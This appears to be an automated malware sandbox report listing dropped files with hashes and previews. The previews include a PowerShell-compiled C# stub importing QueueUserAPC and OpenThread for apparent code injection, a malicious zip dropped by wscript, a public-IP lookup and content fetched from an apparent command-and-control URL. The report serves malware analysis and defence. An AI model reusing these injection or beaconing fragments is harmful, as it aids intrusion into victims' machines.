                                                                                                                                          Preview: qnbw7POhhOvWjjjOoG705V/fzFquo/6TJPkGufCBViPPHYw55tv+iPpog1ePIaLT0HKsQB8qAmPZ0MiJADiJcRoWVwHAJQw0LkECJ0oaLCf/aZXECKxTkdXfDZueEqbOhezEKnTdfYj2L/LJDvzAZbctz2naqnFPj1IEkftRefEsvKdEuldhCABq1AGUflOp6MmTvCJaq4chtUC9Q8TwT7ahrqTh0MJ48eFyAdn7hXUVhNjz3C0ALJRqKJgziL82FBmBQeDLHLDczTAOUgOHM8sk41FtWMqc4NycQEME4fh+7oo53vtg225JXxDFV2hFe5veSIXDLS8Ke4ewsJfxNbAV8AFcH/tKKTFkrvHEuT7hYBHnHmRc7dg3GAAwzCaOEHNAau7mx0fFSJBNf1CFj+PB26dijy/iLHhBV+K6iKD8fpPCWHhb4eBNDNOn04K4zLsNBIxRv/SqM4ESXekTLMXpJtDEuEzVagnSfqktIiVMsuqa8qYAJOqZKg+gC0/6OF2Y8uupSAWDcScgIRf5E7UO1vkq6qClMabAHe/a85jh2O8ibFC3u6tcDL+aqTIBPEFTga8I+uY8CjCy7Go1zYp4hZ7y4OJ6DuPIWyVht6cmf0/NDsLuU39926u3AGjazazlwVotJNsIzccLPdi29U9K2ntBTR39EIqs6oI8XQmHKCknA8PmuvIVZtqobBE641+EHJ4VhoviofiY7UidXF778dMaV2Qc0pL3eQ68/yRL4o7jNzOVkEfvDBD6tB2I9pmK6EYcCbS79sLqmlUhqQJy8EozM1ehgYRv4wBq+/4kt5PY6+7LNXi7b0bCYiqss7CE9J6DaJSfyl3CvQqSUuaA0PZ5CnwQwcSTQoZii1ehbPX0XtZXUrrellZAKzpZGHdTH1yljq7sAn5ZquHKV9hDcJHgoOyHBomJwKwQaIO2hcfbsOiiQQnbnyU4zLYohcnvCwUMANUZFIIKs/Zhx4j3SI0ibvqzQAyzdDnH
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\k[1].htm
                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                          File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):338028
                                                                                                                                          Entropy (8bit):5.999918695533632
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:Zf73p9f6HTHAOHur1/xOZS83M6FWYbK9/gf14nNWiqSoEbMTozy5KlBuRTq:J3pegmy1pgxEYmBcmSSdbMM4RTq
                                                                                                                                          MD5:74C0FF61806856E0601DBEC941DA624D
                                                                                                                                          SHA1:85A8DDE4E0C6ACA4247B6F0321EB901DFB0C34AE
                                                                                                                                          SHA-256:3FE5D931BAEE5A2117E7AA9D0805F9F0DE486C29F4AC62280B86FC420B6B2E80
                                                                                                                                          SHA-512:D7A87C04BD103A4C7E5E4716C78B442BF7E5B0292A3D68A382D9E2887DA7D18E8733AC07E47D445FE82A5382D5AA96B71293FF8F7E5617513A64AB19A485F8EB
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:http://api10.laptok.at/api1/HCmdTF9ssS2xPQYmTqbko/QSaXs_2BFCMwb9WJ/TzYhMx5eXoG7h0c/n88BmwhZe9ijt5oT_2/Fx6667KDX/SidvZb9thKv8bvTE_2Bd/bd09MXr6sZJK_2B0qyS/ttipC86Fa_2BhWcPHgFDgb/FLKb2aUcMy7Ws/o6qiRO8c/nNeTK_2FSOWylkimJJN1ZPK/7CLWQhh7_2/FsBidPde1di4dmq_2/FoYbJ3dZ5_2F/jbxcTO3nXc9/SExxKRXHJLHHvI/_2BhbueQTaU2MuoAANkGM/Ms1_0A_0DsFCZtvF/RsiXqTx0w_2B7BA/8qwDi436YGxlKYNqBk/I9GfQ7ay9/1WHi9CeL/hOQKKrEqdJo6/k
                                                                                                                                          Preview: lm4aq8LsZ0CnjuSc7Kzqzdla3RDwkISvh5jIeC2xM5lIiA25vQGqGNFBAkO7XVxTu37lbn5TzqG8DYdBOuuW7FWsFpHJ96ctPhP/6QiItWVmSSWkmle3Bulr+d43yR0oqFk0LtY/Co2i+5RdlZHc9io/UaZllz1DnVUE9FpxBzj0azOjdJIvVxENnYdyqL6e8Mpu5SiTJvhRMcsX7zDgi4Cs/YsAa/oGKbobNc73ANj+Gw9RzAdgYr2/b+c6xAovnAoG8GV4gFwZaMc7SGZhcRrzj3eo/PPWc4Gqd8XUJk9OHO9ZhnEQ+MlD4vJMlpR6102FVBHvP0dBExvvzbDlXRj1bqQtl2yPCP5vMPKk6vNAkEqpDJM3VlO7a+rnTSmmg92EAZyu0+HCV3QW9z0tMNqG0ZYm4BKB4ZWbGOiCbpdvA1uZNfPp/Y8WP078mWtKzt+mV62A0K+b1s64nYJ3hEYWx8VFnf3bq5Auhfaxot2jlsdz81zti6vjRd5JUCdg/1aXqTG1CT5Df0qoAg9bicHSVkNFIOuQZoLfLQITbLcUVUZQ9bV4SDaTOm3pZvGFZwzObDgmByiFbFbZTAm1Gdu/DDm8g6J+Lt6Bz83sDKKiurg3fgFegiJWMuUwEoFPdbfOLCuuqNZC+02IDTYrX4+jEqZ6ov+AHbWoZBYYlBj5Qal/xaGe5vzFpCRNl9Hupyeuy+gM+3zLJITSk6HEMeVOOS1ZA2pLU+Gx6JcKiB/rqlhSu4KXU/EX3tf9kS8/UBy2ruoVttVF3IwMG4stVLe9qRFpzWyhq2mvdEFdsdZ+wMGx3yK7UPF6ZLE0/6H+nWd0ZgPHN9TFzKA0zZuW+//WQdBA1YX6si+t3sFJ5q6Z8QUUEuufs2JEPVZJjEUAvgBRiC9GmCxFVc/tXbnU3EjpoRVvm9QRvt+JjeZLgpTyztTDiXNHpyNa6aL2duvEESfeW4+TQz4kvOUSsgtR3VjI539sSOOcb42I7waP
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):11606
                                                                                                                                          Entropy (8bit):4.8910535897909355
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
                                                                                                                                          MD5:7A57D8959BFD0B97B364F902ACD60F90
                                                                                                                                          SHA1:7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
                                                                                                                                          SHA-256:47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
                                                                                                                                          SHA-512:83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1192
                                                                                                                                          Entropy (8bit):5.325275554903011
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKaBPnKdi5:qEPerB4nqRL/HvFe9t4CvpBfui5
                                                                                                                                          MD5:C85C42A32E22DE29393FCCCCF3BBA96E
                                                                                                                                          SHA1:EAF3755C63061C96400536041D4F4EB8BC66E99E
                                                                                                                                          SHA-256:9022F6D5F92065B07E1C63F551EC66E19B13E067C179C65EF520BA10DA8AE42C
                                                                                                                                          SHA-512:7708F8C2F4A6B362E35CED939F87B1232F19E16F191A67E29A00E6BB3CDCE89299E9A8D7129C3DFBF39C2B0EBAF160A8455D520D5BFB9619E4CDA5CC9BDCF550
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                          C:\Users\user\AppData\Local\Temp\404E.bi1
                                                                                                                                          Process:C:\Windows\System32\nslookup.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):112
                                                                                                                                          Entropy (8bit):4.48992345445028
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:cPLgeqnhARtt7TSjjhThARtn6an:o0eqnWbtChWbn6a
                                                                                                                                          MD5:1784914AE468F35A55BBAF2A8D746D04
                                                                                                                                          SHA1:7959C412D18BEBCE89AF9DC3715AA17A703467B1
                                                                                                                                          SHA-256:E32BFF5542AF45D88A381F1F0239906ACC07E086FD4F93D9A057A70D48DF4E1A
                                                                                                                                          SHA-512:CD36A88A3E8E5D11B606B65A72070FD1A60960ED7D4CC0713274039E328038FD129FC57DD806A8F66D2A82E9AF18304E7E39E494A75ECD3B40CA7EA6EE3D688C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: Server: resolver1.opendns.com..Address: 208.67.222.222....Name: myip.opendns.com..Address: 84.17.52.25....
                                                                                                                                          C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.0.cs
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):402
                                                                                                                                          Entropy (8bit):5.038590946267481
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:V/DsYLDS81zuJeMRSR7a1ehk1wJveJSSRa+rVSSRnA/fuHo8zy:V/DTLDfuC3jJWv9rV5nA/2IAy
                                                                                                                                          MD5:D318CFA6F0AA6A796C421A261F345F96
                                                                                                                                          SHA1:8CC7A3E861751CD586D810AB0747F9C909E7F051
                                                                                                                                          SHA-256:F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
                                                                                                                                          SHA-512:10EB4A6982093BE06F7B4C15F2898F0C7645ECD7EFA64195A9940778BCDE81CF54139B3A65A1584025948E87C37FAF699BE0B4EB5D6DFAEC41CDCC25E0E7BDA8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tba. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr muapoay,IntPtr ownmggmyjwj,IntPtr blggfu);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uxd,uint egqs,IntPtr yobweqmfam);.. }..}.
                                                                                                                                          C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):369
                                                                                                                                          Entropy (8bit):5.2685350696131525
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fwHiRwzxs7+AEszIwkn23fwHiR7GAn:p37Lvkmb6KRfYHiRwWZEifYHiR7x
                                                                                                                                          MD5:0B11F29185DB421C00903F45FE024AE2
                                                                                                                                          SHA1:DFF6A6F691D759E5F9B2235BDC4312CC813D126D
                                                                                                                                          SHA-256:A3B0D0B7F39D2C021C2075344B7AE6224CBB622B8EF23AF17EAE1AF6419ADC5A
                                                                                                                                          SHA-512:5290245920DB66BFBBE492764FD676D0478941635F478F5E662E239788DED63B0CCF360E1CCA2DAD0B7BBECD3F21C3540851F951671B2B62402A9C0E24EA4CED
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.0.cs"
                                                                                                                                          C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dll
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3584
                                                                                                                                          Entropy (8bit):2.6131948792968713
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:etGSK/W2Dg85xL/XsB4z27L4zqhRqPPtkZfsFKfn+II+ycuZhN+/akSx4PNnq:6fWb5xL/OLbbuuJsFKPn1ulWa3Cq
                                                                                                                                          MD5:CDE35CA5287C4F9E965411C0392061FD
                                                                                                                                          SHA1:ADB2B06B3A662D8F7672F04CE1CCB53C14495DCC
                                                                                                                                          SHA-256:719B17E1FA8033BC84E9A4C24B4BB5D7FF2A6319CA17CE85B40BD9E1EEA785D8
                                                                                                                                          SHA-512:82EC4B2C1BB291EDF2F2EB87C0B8CD19A6AAE423FC3C0E1D7EE10B93C9B0B2024961763D8F2869F325183E1DC7006273295173C8AB908DF23D00EF9FCD97E2DE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....o.....{.....................a. ...a...!.a.%...a.......*.....3./.....6.......C.......V................................................<Module>.5b2bnkld.dll.tba.W32.mscorlib.Syst
                                                                                                                                          C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.out
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):412
                                                                                                                                          Entropy (8bit):4.871364761010112
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                          C:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:MSVC .res
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):652
                                                                                                                                          Entropy (8bit):3.1029347611044296
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryw/ak7Ynqqx4PN5Dlq5J:+RI+ycuZhN+/akSx4PNnqX
                                                                                                                                          MD5:37B56DB5457D9352C7F283016DF87B68
                                                                                                                                          SHA1:A200E669F621C0048D0C9D56DD9CF2F75B023662
                                                                                                                                          SHA-256:00CE7C8C5DECB076018E1F83D75BC20D60EB98D0F0BAFD79A39D0F1054FE70E2
                                                                                                                                          SHA-512:319CEA659A5835979F55F4F151B7011BAD3C247F111B01E19941DF4A7EDC65993DEE972FA7276B2D45CDF7CA086E5185D96F9FB350CAFD1C12537B115BCA0E24
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.b.2.b.n.k.l.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.b.2.b.n.k.l.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                          C:\Users\user\AppData\Local\Temp\Bonaparte.zip
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):41938
                                                                                                                                          Entropy (8bit):7.989242204320437
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:gAmgadYntvl1KeeHgh7gfGUeVRn5XotJMhv5Mmg0imtI9v0IN7l:g7uTCCEMakKmhIM2
                                                                                                                                          MD5:C88641703830B3DF0E04A2CF3B9497ED
                                                                                                                                          SHA1:F46E2FE6F66C94DBB6A2D31F7E3D63586B2A0B71
                                                                                                                                          SHA-256:B138293D0EA58C51021F2BA5355D8215323189AAFB486B62315513C41B39E1F0
                                                                                                                                          SHA-512:A67053E99FF0F06F3575191A4A9B4976832DE7D7EFB3E9652935E32130830E6EEF340BF044477DC061E49D588960D2792B3A93CDACA1E329E8012228845DD96D
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: PK........j.tQR.N.............marginal.roq..TS].0L...A....tA....T!.AD@..*"%....:..J..H..D)..n.E.wB.w...e.../k.....^.{.....M.i.ECKCC.@...Rih.......?^....9@S...[E.A...v.wxb.`.........C..g;.k;.%.[<...?...r./...44...4R.....7As.....IC.&U.n......k....4..-^.}_..-.....o....>r}44.....44........sz............1.37q2...e.o.T.@......M....GO...:.V..S..r.FO...G.|..0..S'. ;.p..t....f......3..q....N.GsK_..."X.....0.`....F-..T.Z..q(..y..F..<.......z.O......G.F.....a...9.y_.&,......;......`.V..}.........a<..2gr..cg....S.E.....rWTN..wP...x.2...s........ID......k.,t...'...*..]#..QZ.....['...P...\].&...Rk1.]..{....... ....4...#g}kc.E...)~H.n......d.O.gl...........@R....@N...>...&G.....%.d...pcv`....j.V.._..VS..j.+.N....+.`.F(&-..S.+*..7U.P.?:..3..=).........x.....6.. ..x...._t.........?....C...FW......R|.J......D.<~..1.A...u.Rx#.j........Oy G...x.....}.S..?.S...p..L.>R>.....B....Q...?z..d:......KI,......8.3........e....G..W..f .wf.D.`..2.8YZ...OX....m..?..E.
                                                                                                                                          C:\Users\user\AppData\Local\Temp\Hettie.jpeg
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):38
                                                                                                                                          Entropy (8bit):4.807009421281392
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Nv6nZ+KE8cOjG:Nv6Z+Kg
                                                                                                                                          MD5:32E2B9D667BCFB4FDFDF0D054EAC8755
                                                                                                                                          SHA1:2AB5BB87549657D68E3FDD4B159972FAA26FF752
                                                                                                                                          SHA-256:46BEB9B153848A5A6506AC907E35CFA8771AACDA08DCDAFA38A351C053394E96
                                                                                                                                          SHA-512:531098616D3E159CFD0A833ED88CABA2C15F124F5CA155AAE0E5D12747EE9B9E2A916E4CC88A804EE8F51E0F8888F368425B80A30DCA35F79FB0FC3B3B83B90F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: iIFNJmSCDlBhMcCeQbfSIOjtxZUzZYWjkFdZfq
                                                                                                                                          C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):89
                                                                                                                                          Entropy (8bit):4.242855375782486
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:oVXVPWOfUuUIIi8JOGXnFPWOfUuUIINLX+n:o9IO8WqYO89u
                                                                                                                                          MD5:0C16B14B295FA31635B2CF0D5608C6CF
                                                                                                                                          SHA1:42E59548F86E0A6E14852FE1054DF70FBBFAA634
                                                                                                                                          SHA-256:624F55C5EE27550C4A9DB0730268EFB7C344328503B83CABDE307FBDFC1DB8A6
                                                                                                                                          SHA-512:1C836340CC9ECE69ED474AB13C87434763388A2591E3348B364B56598E539B638B3DEC0645F92575685414C9DD487C41B7BBCBF37BF2BBCDD3F966D36D7A44E9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: [2020/11/23 12:19:18.230] Latest deploy version: ..[2020/11/23 12:19:18.230] 11.211.2 ..
                                                                                                                                          C:\Users\user\AppData\Local\Temp\RES16AC.tmp
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2184
                                                                                                                                          Entropy (8bit):2.7054796719836367
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:p+fk/DfHehKdNNI+ycuZhNwakS8PNnq9qpee9Ep:ckrUKd31ulwa3sq9J
                                                                                                                                          MD5:1B9AFA76FC15BF543147D557EE80F010
                                                                                                                                          SHA1:B7DD435D5295FED0DC2D8F10CFD253B38B76F527
                                                                                                                                          SHA-256:5BDD2A24E013CBCFDCB38BA23F2126F69052DA3E4A0BF5BF352072B39F72100C
                                                                                                                                          SHA-512:E143E970FC5FF10CF3523C6B6775B1B380DB5160252CD02D353EBFA0D172EBB66D49DD92DE1384F5CC506DA2E2B9110C10261DA05668EC4989E230B18083CAF7
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ........T....c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP................'@-.j...O....)H..........4.......C:\Users\user\AppData\Local\Temp\RES16AC.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\RES269.tmp
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2184
                                                                                                                                          Entropy (8bit):2.703220305924983
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:bZfqiG0snfHghKdNfI+ycuZhN+/akSx4PNnq9qpJ6e9Ep:bBqiVsfiKd91ulWa3Cq9T
                                                                                                                                          MD5:621B3DC6A58CB8EBF6602E924A0D27CE
                                                                                                                                          SHA1:2801A81290D7389CBD078852A82DA94F093CDF00
                                                                                                                                          SHA-256:25E75007CCFC26B2C838A1A8C05D87CED9AF9475A9B0097B39F0B2DA2AD94C24
                                                                                                                                          SHA-512:BF3985DFF0C6E52A794CA9ECA0D36629B32895A31774B4BD646A12E79C2195522D191739B058E326523F20DF3A4A803F0E00ED5A2209CC069A5B54E236A05842
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ........S....c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP................7.m.E}.R...m.{h..........3.......C:\Users\user\AppData\Local\Temp\RES269.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqjlg1ip.3rs.ps1
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 1
                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3uhcgdk.pa4.psm1
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 1
                                                                                                                                          C:\Users\user\AppData\Local\Temp\adobe.url
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):108
                                                                                                                                          Entropy (8bit):4.699454908123665
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
                                                                                                                                          MD5:99D9EE4F5137B94435D9BF49726E3D7B
                                                                                                                                          SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
                                                                                                                                          SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
                                                                                                                                          SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
                                                                                                                                          C:\Users\user\AppData\Local\Temp\hemp.mp4
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):21
                                                                                                                                          Entropy (8bit):4.201841232302569
                                                                                                                                          Encrypted:false
